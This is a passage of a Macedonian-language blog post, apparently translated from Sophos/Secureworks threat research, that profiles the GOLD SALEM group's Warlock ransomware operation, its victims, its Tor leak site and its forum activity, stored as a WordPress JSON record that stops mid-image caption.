{"id":11914,"date":"2025-09-26T13:21:37","date_gmt":"2025-09-26T11:21:37","guid":{"rendered":"https:\/\/kabtel.mk\/?p=11914"},"modified":"2025-09-26T13:21:37","modified_gmt":"2025-09-26T11:21:37","slug":"ransomware-warlock-gold-salem","status":"publish","type":"post","link":"https:\/\/kabtel.mk\/en\/ransomware-warlock-gold-salem\/","title":{"rendered":"\u041d\u043e\u0432\u0438\u043e\u0442 ransomware Warlock \u043d\u0430 GOLD SALEM \u0432\u043e \u0430\u043a\u0446\u0438\u0458\u0430"},"content":{"rendered":"<article id=\"post-962800\" class=\"post-962800 post type-post status-publish format-standard has-post-thumbnail hentry category-threat-research tag-cybercrime tag-featured tag-gold-salem tag-ransomware tag-warlock region-en-us\">\n<header>\n<div class=\"container mt-8 md:mt-16 md:-mb-4\">\n<div class=\"max-w-4xl mx-auto\">\n<h5 class=\"text-style-h1 mb-8\"><span dir=\"auto\">\u041e\u043f\u0435\u0440\u0430\u0446\u0438\u0458\u0430\u0442\u0430 Warlock \u043d\u0430 \u0433\u0440\u0443\u043f\u0430\u0446\u0438\u0458\u0430\u0442\u0430 GOLD SALEM \u0441\u0435 \u043f\u0440\u0438\u043a\u043b\u0443\u0447\u0443\u0432\u0430 \u043d\u0430 \u043f\u0440\u0435\u043d\u0430\u0442\u0440\u0443\u043f\u0430\u043d\u0438\u043e\u0442 \u043f\u0435\u0458\u0437\u0430\u0436 \u0441\u043e ransomware<\/span><\/h5>\n<div class=\"text-xl md:text-2xl -mt-2 mb-6\"><span dir=\"auto\">\u041d\u043e\u0432\u0430\u0442\u0430 \u0433\u0440\u0443\u043f\u0430 \u0434\u0435\u043c\u043e\u043d\u0441\u0442\u0440\u0438\u0440\u0430 \u043a\u043e\u043c\u043f\u0435\u0442\u0435\u043d\u0442\u043d\u0438 \u0432\u0435\u0448\u0442\u0438\u043d\u0438 \u043a\u043e\u0440\u0438\u0441\u0442\u0435\u0458\u045c\u0438 \u043f\u043e\u0437\u043d\u0430\u0442 \u043f\u0440\u0438\u0440\u0430\u0447\u043d\u0438\u043a \u0437\u0430 \u0440\u0430\u043d\u0441\u043e\u043c\u0432\u0435\u0440 \u0438 \u043d\u0430\u0432\u0435\u0441\u0442\u0443\u0432\u0430\u045a\u0430 \u0437\u0430 \u0433\u0435\u043d\u0438\u0458\u0430\u043b\u043d\u043e\u0441\u0442.<\/span><\/div>\n<div><\/div>\n<div class=\"text-sophos-gray-600 mt-4 text-xs font-sansSemiBold font-semibold leading-tight uppercase\"><span dir=\"auto\" style=\"text-align: justify;\">\u0418\u0441\u0442\u0440\u0430\u0436\u0443\u0432\u0430\u0447\u0438\u0442\u0435 \u043d\u0430 Counter Threat Unit\u2122 (CTU) \u0441\u043b\u0435\u0434\u0430\u0442 \u0433\u0440\u0443\u043f\u0430 \u0437\u0430\u043a\u0430\u043d\u0438 \u043a\u043e\u0458\u0430 \u0441\u0435\u0431\u0435\u0441\u0438 \u0441\u0435 \u043d\u0430\u0440\u0435\u043a\u0443\u0432\u0430 Warlock Group. \u0413\u0440\u0443\u043f\u0430\u0442\u0430, \u043a\u043e\u0458\u0430 \u0438\u0441\u0442\u0440\u0430\u0436\u0443\u0432\u0430\u0447\u0438\u0442\u0435 \u043d\u0430 CTU\u2122 \u0458\u0430 \u0441\u043b\u0435\u0434\u0430\u0442 \u043a\u0430\u043a\u043e <\/span><a style=\"text-align: justify;\" href=\"https:\/\/www.secureworks.com\/research\/threat-profiles\/gold-salem\"><span dir=\"auto\">GOLD SALEM<\/span><\/a><span dir=\"auto\" style=\"text-align: justify;\">\u00a0, \u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0438\u0442\u0438\u0440\u0430\u043b\u0430 \u043c\u0440\u0435\u0436\u0438 \u0438 \u0433\u043e \u0440\u0430\u0441\u043f\u043e\u0440\u0435\u0434\u0438\u043b\u0430 \u0441\u0432\u043e\u0458\u043e\u0442 Warlock ransomware \u043e\u0434 \u043c\u0430\u0440\u0442 2025 \u0433\u043e\u0434\u0438\u043d\u0430. Microsoft \u0458\u0430\u00a0<\/span><a style=\"text-align: justify;\" href=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2025\/07\/22\/disrupting-active-exploitation-of-on-premises-sharepoint-vulnerabilities\/#storm-2603\"><span dir=\"auto\">\u043d\u0430\u0440\u0435\u043a\u0443\u0432\u0430<\/span><\/a><span dir=\"auto\" style=\"text-align: justify;\">\u00a0\u043e\u0432\u0430\u0430 \u0433\u0440\u0443\u043f\u0430 \u0437\u0430\u043a\u0430\u043d\u0438 Storm-2603 \u0438 \u0458\u0430 \u043a\u0430\u0440\u0430\u043a\u0442\u0435\u0440\u0438\u0437\u0438\u0440\u0430 \u201e\u0441\u043e \u0443\u043c\u0435\u0440\u0435\u043d\u0430 \u0434\u043e\u0432\u0435\u0440\u0431\u0430 \u0434\u0435\u043a\u0430 \u0435 \u0437\u0430\u043a\u0430\u043d\u0443\u0432\u0430\u0447\u043a\u0430 \u0441\u043e \u0441\u0435\u0434\u0438\u0448\u0442\u0435 \u0432\u043e \u041a\u0438\u043d\u0430\u201c, \u043d\u043e \u0438\u0441\u0442\u0440\u0430\u0436\u0443\u0432\u0430\u0447\u0438\u0442\u0435 \u043d\u0430 CTU \u043d\u0435\u043c\u0430\u0430\u0442 \u0434\u043e\u0432\u043e\u043b\u043d\u043e \u0434\u043e\u043a\u0430\u0437\u0438 \u0437\u0430 \u0434\u0430 \u0433\u043e \u043f\u043e\u0442\u0432\u0440\u0434\u0430\u0442 \u043e\u0432\u0430 \u043f\u0440\u0438\u043f\u0438\u0448\u0443\u0432\u0430\u045a\u0435.<\/span><\/div>\n<\/div>\n<\/div>\n<\/header>\n<div class=\"container md:my-16 xl:my-24 my-8\">\n<div class=\"entry-content lg:prose-lg mx-auto prose max-w-4xl\">\n<h6 style=\"text-align: justify;\"><span dir=\"auto\">\u0412\u0438\u043a\u0442\u0438\u043c\u043e\u043b\u043e\u0433\u0438\u0458\u0430 \u0438 \u043e\u043d\u043b\u0430\u0458\u043d \u0430\u043a\u0442\u0438\u0432\u043d\u043e\u0441\u0442<\/span><\/h6>\n<p style=\"text-align: justify;\"><span dir=\"auto\">60-\u0442\u0435 \u043e\u0431\u0458\u0430\u0432\u0435\u043d\u0438 \u0436\u0440\u0442\u0432\u0438 \u043d\u0430 \u0433\u0440\u0443\u043f\u0430\u0442\u0430 \u0434\u043e \u0441\u0440\u0435\u0434\u0438\u043d\u0430\u0442\u0430 \u043d\u0430 \u0441\u0435\u043f\u0442\u0435\u043c\u0432\u0440\u0438 2025 \u0433\u043e\u0434\u0438\u043d\u0430 \u0458\u0430 \u0440\u0430\u043d\u0433\u0438\u0440\u0430\u0430\u0442 \u0432\u043e \u0441\u0440\u0435\u0434\u0438\u043d\u0430\u0442\u0430, \u0432\u043e \u0441\u043f\u043e\u0440\u0435\u0434\u0431\u0430 \u0441\u043e \u0434\u0440\u0443\u0433\u0438\u0442\u0435 \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u0438 \u0441\u043e ransomware \u0432\u043e \u0438\u0441\u0442\u0438\u043e\u0442 \u043f\u0435\u0440\u0438\u043e\u0434. \u0416\u0440\u0442\u0432\u0438\u0442\u0435 \u043d\u0430 GOLD SALEM \u0441\u0435 \u043e\u0434 \u043c\u0430\u043b\u0438 \u043a\u043e\u043c\u0435\u0440\u0446\u0438\u0458\u0430\u043b\u043d\u0438 \u0438\u043b\u0438 \u0432\u043b\u0430\u0434\u0438\u043d\u0438 \u0441\u0443\u0431\u0458\u0435\u043a\u0442\u0438 \u0434\u043e \u0433\u043e\u043b\u0435\u043c\u0438 \u043c\u0443\u043b\u0442\u0438\u043d\u0430\u0446\u0438\u043e\u043d\u0430\u043b\u043d\u0438 \u043a\u043e\u0440\u043f\u043e\u0440\u0430\u0446\u0438\u0438 \u0440\u0430\u0441\u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u0435\u0442\u0438 \u043d\u0438\u0437 \u0421\u0435\u0432\u0435\u0440\u043d\u0430 \u0410\u043c\u0435\u0440\u0438\u043a\u0430, \u0415\u0432\u0440\u043e\u043f\u0430 \u0438 \u0408\u0443\u0436\u043d\u0430 \u0410\u043c\u0435\u0440\u0438\u043a\u0430. \u041a\u0430\u043a\u043e \u0438 \u043f\u043e\u0432\u0435\u045c\u0435\u0442\u043e \u0433\u0440\u0443\u043f\u0438 \u0441\u043e ransomware, GOLD SALEM \u0432\u043e \u0433\u043e\u043b\u0435\u043c\u0430 \u043c\u0435\u0440\u0430 \u0438\u0437\u0431\u0435\u0433\u043d\u0443\u0432\u0430\u0448\u0435 \u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0438\u0442\u0438\u0440\u0430\u045a\u0435 \u043d\u0430 \u043e\u0440\u0433\u0430\u043d\u0438\u0437\u0430\u0446\u0438\u0438 \u043b\u043e\u0446\u0438\u0440\u0430\u043d\u0438 \u0432\u043e \u041a\u0438\u043d\u0430 \u0438 \u0420\u0443\u0441\u0438\u0458\u0430 \u0438 \u043f\u043e\u043a\u0440\u0430\u0458 \u0433\u043e\u043b\u0435\u043c\u0438\u043e\u0442 \u0431\u0440\u043e\u0458 \u043f\u043e\u0442\u0435\u043d\u0446\u0438\u0458\u0430\u043b\u043d\u0438 \u0446\u0435\u043b\u0438. \u0421\u0435\u043f\u0430\u043a, \u0433\u0440\u0443\u043f\u0430\u0442\u0430 \u0433\u043e \u043e\u0431\u0458\u0430\u0432\u0438 \u0438\u043c\u0435\u0442\u043e \u043d\u0430 \u0436\u0440\u0442\u0432\u0430\u0442\u0430 \u0441\u043e \u0441\u0435\u0434\u0438\u0448\u0442\u0435 \u0432\u043e \u0420\u0443\u0441\u0438\u0458\u0430 \u043d\u0430 \u0441\u0432\u043e\u0458\u0430\u0442\u0430 \u043d\u0430\u043c\u0435\u043d\u0441\u043a\u0430 \u043b\u043e\u043a\u0430\u0446\u0438\u0458\u0430 \u0437\u0430 \u043f\u0440\u043e\u0442\u0435\u043a\u0443\u0432\u0430\u045a\u0435 (DLS) \u043d\u0430 8 \u0441\u0435\u043f\u0442\u0435\u043c\u0432\u0440\u0438. \u041a\u043e\u043c\u0435\u0440\u0446\u0438\u0458\u0430\u043b\u043d\u0438\u043e\u0442 \u0441\u0443\u0431\u0458\u0435\u043a\u0442 \u043e\u0431\u0435\u0437\u0431\u0435\u0434\u0443\u0432\u0430 \u0438\u043d\u0436\u0435\u043d\u0435\u0440\u0441\u043a\u0438 \u0443\u0441\u043b\u0443\u0433\u0438 \u0438 \u043e\u043f\u0440\u0435\u043c\u0430 \u0437\u0430 \u0438\u043d\u0434\u0443\u0441\u0442\u0440\u0438\u0458\u0430\u0442\u0430 \u0437\u0430 \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u0434\u0441\u0442\u0432\u043e \u043d\u0430 \u0435\u043b\u0435\u043a\u0442\u0440\u0438\u0447\u043d\u0430 \u0435\u043d\u0435\u0440\u0433\u0438\u0458\u0430.<\/span><\/p>\n<p style=\"text-align: justify;\"><span dir=\"auto\">GOLD SALEM \u043d\u0435\u043c\u0430\u0448\u0435 \u0458\u0430\u0432\u043d\u043e \u043f\u0440\u0438\u0441\u0443\u0441\u0442\u0432\u043e \u0441\u00e8 \u0434\u043e \u043e\u0431\u0458\u0430\u0432\u0430\u0442\u0430 \u043d\u0430 \u043f\u043e\u0434\u0437\u0435\u043c\u043d\u0438\u043e\u0442 \u0444\u043e\u0440\u0443\u043c RAMP \u0432\u043e \u0458\u0443\u043d\u0438 2025 \u0433\u043e\u0434\u0438\u043d\u0430 \u043e\u0434 \u0441\u0442\u0440\u0430\u043d\u0430 \u043d\u0430 \u043b\u0438\u0447\u043d\u043e\u0441\u0442 \u0448\u0442\u043e \u0458\u0430 \u043f\u0440\u0435\u0442\u0441\u0442\u0430\u0432\u0443\u0432\u0430\u0448\u0435 \u0433\u0440\u0443\u043f\u0430\u0442\u0430, \u043a\u043e\u0458\u0430 \u0431\u0430\u0440\u0430\u0448\u0435 \u0435\u043a\u0441\u043f\u043b\u043e\u0430\u0442\u0430\u0446\u0438\u0438 \u0437\u0430 \u0432\u043e\u043e\u0431\u0438\u0447\u0430\u0435\u043d\u0438 \u043a\u043e\u0440\u043f\u043e\u0440\u0430\u0442\u0438\u0432\u043d\u0438 \u0430\u043f\u043b\u0438\u043a\u0430\u0446\u0438\u0438 (\u043d\u0430 \u043f\u0440., Veeam, ESXi, SharePoint) \u0438 \u0430\u043b\u0430\u0442\u043a\u0438 \u0437\u0430 \u0443\u043d\u0438\u0448\u0442\u0443\u0432\u0430\u045a\u0435 \u043d\u0430 \u0441\u0438\u0441\u0442\u0435\u043c\u0438 \u0437\u0430 \u043e\u0442\u043a\u0440\u0438\u0432\u0430\u045a\u0435 \u0438 \u043e\u0434\u0433\u043e\u0432\u043e\u0440 \u043d\u0430 \u043a\u0440\u0430\u0458\u043d\u0438 \u0442\u043e\u0447\u043a\u0438 (EDR) \u0438 \u0434\u0440\u0443\u0433\u0438 \u0431\u0435\u0437\u0431\u0435\u0434\u043d\u043e\u0441\u043d\u0438 \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u0434\u0438. \u0412\u043e \u043f\u043e\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u043d\u0430 \u043e\u0431\u0458\u0430\u0432\u0430 \u0441\u0435 \u0431\u0430\u0440\u0430\u0448\u0435 \u0441\u043e\u0440\u0430\u0431\u043e\u0442\u043a\u0430 \u043e\u0434 \u0431\u0440\u043e\u043a\u0435\u0440\u0438 \u0437\u0430 \u043f\u043e\u0447\u0435\u0442\u0435\u043d \u043f\u0440\u0438\u0441\u0442\u0430\u043f (IAB) \u0432\u043e \u043e\u0431\u0435\u0437\u0431\u0435\u0434\u0443\u0432\u0430\u045a\u0435\u0442\u043e \u043f\u043e\u0442\u0435\u043d\u0446\u0438\u0458\u0430\u043b\u043d\u0438 \u0436\u0440\u0442\u0432\u0438. \u041d\u0435 \u0435 \u0458\u0430\u0441\u043d\u043e \u0434\u0430\u043b\u0438 \u0433\u0440\u0443\u043f\u0430\u0442\u0430 \u0431\u0430\u0440\u0430\u043b\u0430 \u043f\u0440\u0438\u0441\u0442\u0430\u043f \u0437\u0430 \u0434\u0430 \u0433\u0438 \u0438\u0437\u0432\u0440\u0448\u0438 \u0441\u043e\u043f\u0441\u0442\u0432\u0435\u043d\u0438\u0442\u0435 \u0443\u043f\u0430\u0434\u0438, \u0440\u0435\u0433\u0440\u0443\u0442\u0438\u0440\u0430\u043b\u0430 \u0444\u0438\u043b\u0438\u0458\u0430\u043b\u0438 \u0437\u0430 \u043d\u043e\u0432\u0430 \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u0458\u0430 ransomware-as-a-service (RaaS) \u0438\u043b\u0438 \u0438 \u0434\u0432\u0435\u0442\u0435.<\/span><\/p>\n<p style=\"text-align: justify;\"><span dir=\"auto\">GOLD SALEM \u0443\u043f\u0440\u0430\u0432\u0443\u0432\u0430 \u0441\u043e DLS \u0431\u0430\u0437\u0438\u0440\u0430\u043d \u043d\u0430 Tor (The Onion Router &#8211; \u043c\u0440\u0435\u0436\u0430 \u0448\u0442\u043e \u0433\u043e \u043c\u0430\u0441\u043a\u0438\u0440\u0430 \u043e\u043d\u043b\u0430\u0458\u043d \u0441\u043e\u043e\u0431\u0440\u0430\u045c\u0430\u0458\u043e\u0442). \u0437\u0430 \u043e\u0431\u0458\u0430\u0432\u0443\u0432\u0430\u045a\u0435 \u043d\u0430 \u043d\u0430\u0432\u043e\u0434\u043d\u0438 \u0438\u043c\u0438\u045a\u0430 \u043d\u0430 \u0436\u0440\u0442\u0432\u0438 \u0438 \u043f\u043e\u0434\u0430\u0442\u043e\u0446\u0438 \u0443\u043a\u0440\u0430\u0434\u0435\u043d\u0438 \u043e\u0434 \u0442\u0438\u0435 \u0436\u0440\u0442\u0432\u0438. \u041e\u0434 16 \u0441\u0435\u043f\u0442\u0435\u043c\u0432\u0440\u0438 32% \u043e\u0434 \u0436\u0440\u0442\u0432\u0438\u0442\u0435 \u0431\u0435\u0430 \u043e\u0431\u0458\u0430\u0432\u0435\u043d\u0438 \u043d\u0430 DLS. \u0414\u043e\u043f\u043e\u043b\u043d\u0438\u0442\u0435\u043b\u043d\u043e, \u0437\u0430\u043a\u0430\u043d\u0443\u0432\u0430\u0447\u043a\u0438\u0442\u0435 \u0430\u043a\u0442\u0435\u0440\u0438 \u0442\u0432\u0440\u0434\u0430\u0442 \u0434\u0435\u043a\u0430 \u043f\u0440\u043e\u0434\u0430\u043b\u0435 \u043f\u043e\u0434\u0430\u0442\u043e\u0446\u0438 \u043e\u0434 45% \u043e\u0434 \u0436\u0440\u0442\u0432\u0438\u0442\u0435 \u043d\u0430 \u043f\u0440\u0438\u0432\u0430\u0442\u043d\u0438 \u043a\u0443\u043f\u0443\u0432\u0430\u0447\u0438, \u043f\u043e\u0442\u0435\u043d\u0446\u0438\u0458\u0430\u043b\u043d\u043e \u043a\u0430\u043a\u043e \u043e\u0434\u0433\u043e\u0432\u043e\u0440 \u043d\u0430 \u043d\u0435\u043f\u043b\u0430\u045c\u0430\u045a\u0435\u0442\u043e \u043e\u0442\u043a\u0443\u043f. \u041f\u043e\u0437\u043d\u0430\u0442\u043e \u0435 \u0434\u0435\u043a\u0430 \u043a\u0438\u0431\u0435\u0440-\u043a\u0440\u0438\u043c\u0438\u043d\u0430\u043b\u043d\u0438\u0442\u0435 \u0433\u0440\u0443\u043f\u0438 \u043f\u043e\u0432\u0440\u0435\u043c\u0435\u043d\u043e \u043f\u0440\u043e\u0434\u0430\u0432\u0430\u0430\u0442 \u0443\u043a\u0440\u0430\u0434\u0435\u043d\u0438 \u043f\u043e\u0434\u0430\u0442\u043e\u0446\u0438 \u043d\u0430 \u0442\u0440\u0435\u0442\u0438 \u0441\u0442\u0440\u0430\u043d\u0438, \u043d\u043e \u0431\u0440\u043e\u0458\u043a\u0438\u0442\u0435 \u043e\u0431\u0458\u0430\u0432\u0435\u043d\u0438 \u043e\u0434 GOLD SALEM \u0432\u0435\u0440\u043e\u0458\u0430\u0442\u043d\u043e \u0441\u0435 \u0437\u0433\u043e\u043b\u0435\u043c\u0435\u043d\u0438 \u0438\u043b\u0438 \u0438\u0437\u043c\u0438\u0441\u043b\u0435\u043d\u0438. \u0422\u0440\u0438 \u0438\u043c\u0438\u045a\u0430 \u043d\u0430 \u0436\u0440\u0442\u0432\u0438 \u043f\u0440\u0435\u0442\u0445\u043e\u0434\u043d\u043e \u043d\u0430\u0432\u0435\u0434\u0435\u043d\u0438 \u043d\u0430 DLS \u0431\u0435\u0430 \u043f\u043e\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u043d\u043e \u043e\u0442\u0441\u0442\u0440\u0430\u043d\u0435\u0442\u0438.<\/span><\/p>\n<p style=\"text-align: justify;\"><span dir=\"auto\">GOLD SALEM \u0433\u0438 \u043e\u0431\u0458\u0430\u0432\u0438 \u0438\u043c\u0438\u045a\u0430\u0442\u0430 \u043d\u0430 \u0436\u0440\u0442\u0432\u0438\u0442\u0435 \u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0438\u0442\u0438\u0440\u0430\u043d\u0438 \u043e\u0434 \u0440\u0430\u0437\u043b\u0438\u0447\u043d\u0438 \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u0438 \u0441\u043e ransomware. \u0418\u0430\u043a\u043e \u0441\u0435 \u0441\u043b\u0443\u0447\u0443\u0432\u0430\u0430\u0442 \u0440\u0435\u0442\u043a\u043e, \u043e\u0432\u0438\u0435 \u043e\u0431\u0458\u0430\u0432\u0438 \u043c\u043e\u0436\u0430\u0442 \u0434\u0430 \u043f\u0440\u0435\u0442\u0441\u0442\u0430\u0432\u0443\u0432\u0430\u0430\u0442 \u0431\u0440\u043e\u043a\u0435\u0440\u0438 \u0437\u0430 \u043f\u043e\u0447\u0435\u0442\u0435\u043d \u043f\u0440\u0438\u0441\u0442\u0430\u043f (IAB), \u0430\u043a\u0442\u0435\u0440\u0438 \u043d\u0430 \u0437\u0430\u043a\u0430\u043d\u0430 \u043a\u043e\u0438 \u0438\u043c \u043f\u0440\u043e\u0434\u0430\u0432\u0430\u0430\u0442 \u043d\u0430 \u0441\u0430\u0458\u0431\u0435\u0440-\u043a\u0440\u0438\u043c\u0438\u043d\u0430\u043b\u0446\u0438\u0442\u0435 \u043f\u0440\u0438\u0441\u0442\u0430\u043f \u0434\u043e \u043c\u0440\u0435\u0436\u0438\u0442\u0435 \u043d\u0430 \u043e\u0440\u0433\u0430\u043d\u0438\u0437\u0430\u0446\u0438\u0438\u0442\u0435, \u0444\u0438\u043b\u0438\u0458\u0430\u043b\u0438 \u043a\u043e\u0438 \u043e\u0431\u0458\u0430\u0432\u0443\u0432\u0430\u0430\u0442 \u0443\u043a\u0440\u0430\u0434\u0435\u043d\u0438 \u043f\u043e\u0434\u0430\u0442\u043e\u0446\u0438 \u043d\u0430 \u043f\u043e\u0432\u0435\u045c\u0435 \u0441\u0442\u0440\u0430\u043d\u0438\u0446\u0438 \u0437\u0430 \u043f\u0440\u043e\u0442\u0435\u043a\u0443\u0432\u0430\u045a\u0435 \u043d\u0430 ransomware \u0438\u043b\u0438 \u043d\u0435\u0443\u0441\u043f\u0435\u0445 \u043d\u0430 \u0436\u0440\u0442\u0432\u0430\u0442\u0430 \u0435\u0444\u0438\u043a\u0430\u0441\u043d\u043e \u0434\u0430 \u0433\u0438 \u043f\u043e\u043f\u0440\u0430\u0432\u0438 \u0432\u043e\u043e\u0431\u0438\u0447\u0430\u0435\u043d\u0438\u0442\u0435 \u043f\u043e\u0447\u0435\u0442\u043d\u0438 \u0432\u0435\u043a\u0442\u043e\u0440\u0438 \u043d\u0430 \u043f\u0440\u0438\u0441\u0442\u0430\u043f, \u0448\u0442\u043e \u0434\u043e\u0432\u0435\u0434\u0443\u0432\u0430 \u0434\u043e \u043f\u043e\u0432\u0442\u043e\u0440\u0435\u043d\u0438 \u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0438\u0442\u0438\u0440\u0430\u045a\u0430. \u041d\u0430 \u043f\u0440\u0438\u043c\u0435\u0440, \u0430\u043c\u0435\u0440\u0438\u043a\u0430\u043d\u0441\u043a\u0438 \u043a\u043e\u043c\u0435\u0440\u0446\u0438\u0458\u0430\u043b\u0435\u043d \u0433\u0440\u0430\u0434\u0435\u0436\u0435\u043d \u0438\u0437\u0432\u0435\u0434\u0443\u0432\u0430\u0447 \u0441\u043e \u0441\u0435\u0434\u0438\u0448\u0442\u0435 \u0432\u043e \u0421\u0410\u0414, \u043d\u0430\u0432\u043e\u0434\u043d\u043e \u043d\u0430 \u043a\u043e\u0458 \u043c\u0443 \u0435 \u0443\u043a\u0440\u0430\u0434\u0435\u043d \u043f\u0440\u0438\u0441\u0442\u0430\u043f\u043e\u0442 \u043d\u0430 \u043f\u043e\u0447\u0435\u0442\u043e\u043a\u043e\u0442 \u043d\u0430 \u0458\u0443\u043d\u0438 2025 \u0433\u043e\u0434\u0438\u043d\u0430, \u043f\u0440\u0435\u0442\u0445\u043e\u0434\u043d\u043e \u0431\u0438\u043b \u0436\u0440\u0442\u0432\u0430 \u043d\u0430 ransomware-\u043e\u0442 Hunters International \u043d\u0430 <\/span><a href=\"https:\/\/www.secureworks.com\/research\/threat-profiles\/gold-crescent\"><span dir=\"auto\">GOLD CRESCENT<\/span><\/a><span dir=\"auto\">\u00a0\u0432\u043e \u043e\u043a\u0442\u043e\u043c\u0432\u0440\u0438 2024 \u0433\u043e\u0434\u0438\u043d\u0430 \u0438 \u043e\u0434 Payout Kings \u0432\u043e \u0458\u0443\u043d\u0438 2025 \u0433\u043e\u0434\u0438\u043d\u0430.<\/span><\/p>\n<p style=\"text-align: justify;\"><span dir=\"auto\">\u041f\u043e\u0434\u0430\u0442\u043e\u0446\u0438\u0442\u0435 \u043e\u0431\u0458\u0430\u0432\u0435\u043d\u0438 \u043e\u0434 GOLD SALEM \u0438 \u043c\u0435\u0442\u0430\u043f\u043e\u0434\u0430\u0442\u043e\u0446\u0438\u0442\u0435 \u0438\u0437\u0432\u043b\u0435\u0447\u0435\u043d\u0438 \u043e\u0434 \u043d\u0438\u0432\u043d\u0438\u043e\u0442 DLS \u0441\u0443\u0433\u0435\u0440\u0438\u0440\u0430\u0430\u0442 \u0434\u0435\u043a\u0430 \u0433\u0440\u0443\u043f\u0430\u0442\u0430 \u0437\u0430\u043f\u043e\u0447\u043d\u0430\u043b\u0430 \u0434\u0430 \u043d\u0430\u043f\u0430\u0453\u0430 \u0438 \u0438\u0437\u043d\u0443\u0434\u0443\u0432\u0430 \u0436\u0440\u0442\u0432\u0438 \u0432\u043e \u043c\u0430\u0440\u0442 2025 \u0433\u043e\u0434\u0438\u043d\u0430. \u041e\u0431\u0458\u0430\u0432\u0430 \u043e\u0434 10 \u0458\u0443\u043d\u0438 \u043d\u0430 \u0444\u043e\u0440\u0443\u043c\u043e\u0442 RAMP \u0433\u043e \u043d\u0430\u0458\u0430\u0432\u0438 Warlock \u0438 \u0432\u043a\u043b\u0443\u0447\u0438 \u043b\u0438\u043d\u043a \u0434\u043e \u043f\u0440\u0432\u0430\u0442\u0430 \u0438\u0442\u0435\u0440\u0430\u0446\u0438\u0458\u0430 \u043d\u0430 DLS \u0431\u0430\u0437\u0438\u0440\u0430\u043d \u043d\u0430 Tor. \u0410\u0434\u0440\u0435\u0441\u0430\u0442\u0430 Tor \u0431\u0435\u0448\u0435 \u0438\u0441\u043a\u043b\u0443\u0447\u0435\u043d\u0430 \u043d\u0430 11 \u0458\u0443\u043d\u0438, \u0430 \u043d\u043e\u0432\u0430 \u0441\u0442\u0440\u0430\u043d\u0438\u0446\u0430 \u0441\u0435 \u043f\u043e\u0458\u0430\u0432\u0438 \u0434\u0443\u0440\u0438 \u043a\u043e\u043d \u043a\u0440\u0430\u0458\u043e\u0442 \u043d\u0430 \u0458\u0443\u043b\u0438. GOLD SALEM \u0438\u043c\u0430 \u0442\u0435\u043d\u0434\u0435\u043d\u0446\u0438\u0458\u0430 \u0434\u0430 \u043e\u0431\u0458\u0430\u0432\u0443\u0432\u0430 \u043d\u0430 DLS \u0432\u043e \u0441\u0435\u0440\u0438\u0438, \u0448\u0442\u043e \u0440\u0435\u0437\u0443\u043b\u0442\u0438\u0440\u0430 \u0441\u043e \u0442\u043e\u0430 \u0448\u0442\u043e \u0436\u0440\u0442\u0432\u0438\u0442\u0435 \u0441\u0435 \u043f\u043e\u0458\u0430\u0432\u0443\u0432\u0430\u0430\u0442 \u043d\u0435\u043a\u043e\u043b\u043a\u0443 \u0434\u0435\u043d\u0430 \u0434\u043e \u043d\u0435\u043a\u043e\u043b\u043a\u0443 \u043d\u0435\u0434\u0435\u043b\u0438 \u043f\u043e \u0432\u0438\u0441\u0442\u0438\u043d\u0441\u043a\u043e\u0442\u043e \u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0438\u0442\u0438\u0440\u0430\u045a\u0435. \u041d\u0430 \u0441\u0435\u043a\u043e\u0458\u0430 \u0436\u0440\u0442\u0432\u0430 \u045d \u0435 \u0434\u043e\u0434\u0435\u043b\u0435\u043d \u0434\u0430\u0442\u0443\u043c \u0437\u0430 \u201e\u043e\u0434\u0431\u0440\u043e\u0458\u0443\u0432\u0430\u045a\u0435\u201c \u0448\u0442\u043e \u0433\u043e \u043e\u0437\u043d\u0430\u0447\u0443\u0432\u0430 \u043a\u0440\u0430\u0458\u043d\u0438\u043e\u0442 \u0440\u043e\u043a \u0437\u0430 \u043f\u043b\u0430\u045c\u0430\u045a\u0435 \u043d\u0430 \u043e\u0442\u043a\u0443\u043f\u043e\u0442 (\u0432\u0438\u0434\u0435\u0442\u0435 \u0458\u0430 \u0441\u043b\u0438\u043a\u0430\u0442\u0430 \u043f\u043e\u0434\u043e\u043b\u0443). \u041e\u0432\u043e\u0458 \u0434\u0430\u0442\u0443\u043c \u0435 \u043e\u0431\u0438\u0447\u043d\u043e 12-14 \u0434\u0435\u043d\u0430 \u043e\u0442\u043a\u0430\u043a\u043e \u0436\u0440\u0442\u0432\u0430\u0442\u0430 \u0441\u0435 \u043f\u043e\u0458\u0430\u0432\u0443\u0432\u0430 \u043d\u0430 DLS.<\/span><\/p>\n<p style=\"text-align: justify;\"><a href=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2025\/09\/Warlock2509-fig2.png\"><img fetchpriority=\"high\" decoding=\"async\" class=\"alignnone size-full wp-image-962798\" src=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2025\/09\/Warlock2509-fig2.png\" sizes=\"(max-width: 640px) 100vw, 640px\" srcset=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2025\/09\/Warlock2509-fig2.png 773w, https:\/\/news.sophos.com\/wp-content\/uploads\/2025\/09\/Warlock2509-fig2.png?resize=300,156 300w, https:\/\/news.sophos.com\/wp-content\/uploads\/2025\/09\/Warlock2509-fig2.png?resize=768,399 768w\" alt=\"\u0422\u0430\u0431\u0435\u043b\u0430 \u0448\u0442\u043e \u0433\u0438 \u043f\u0440\u0438\u043a\u0430\u0436\u0443\u0432\u0430 \u0434\u0430\u0442\u0443\u043c\u0438\u0442\u0435 \u043d\u0430 \u043e\u0434\u0431\u0440\u043e\u0458\u0443\u0432\u0430\u045a\u0435 \u0434\u043e\u0434\u0435\u043b\u0435\u043d\u0438 \u043d\u0430 \u0436\u0440\u0442\u0432\u0438\u0442\u0435 \u043e\u0434 GOLD SALEM, \u0448\u0442\u043e \u0443\u043a\u0430\u0436\u0443\u0432\u0430 \u043a\u043e\u0433\u0430 \u043c\u043e\u0440\u0430 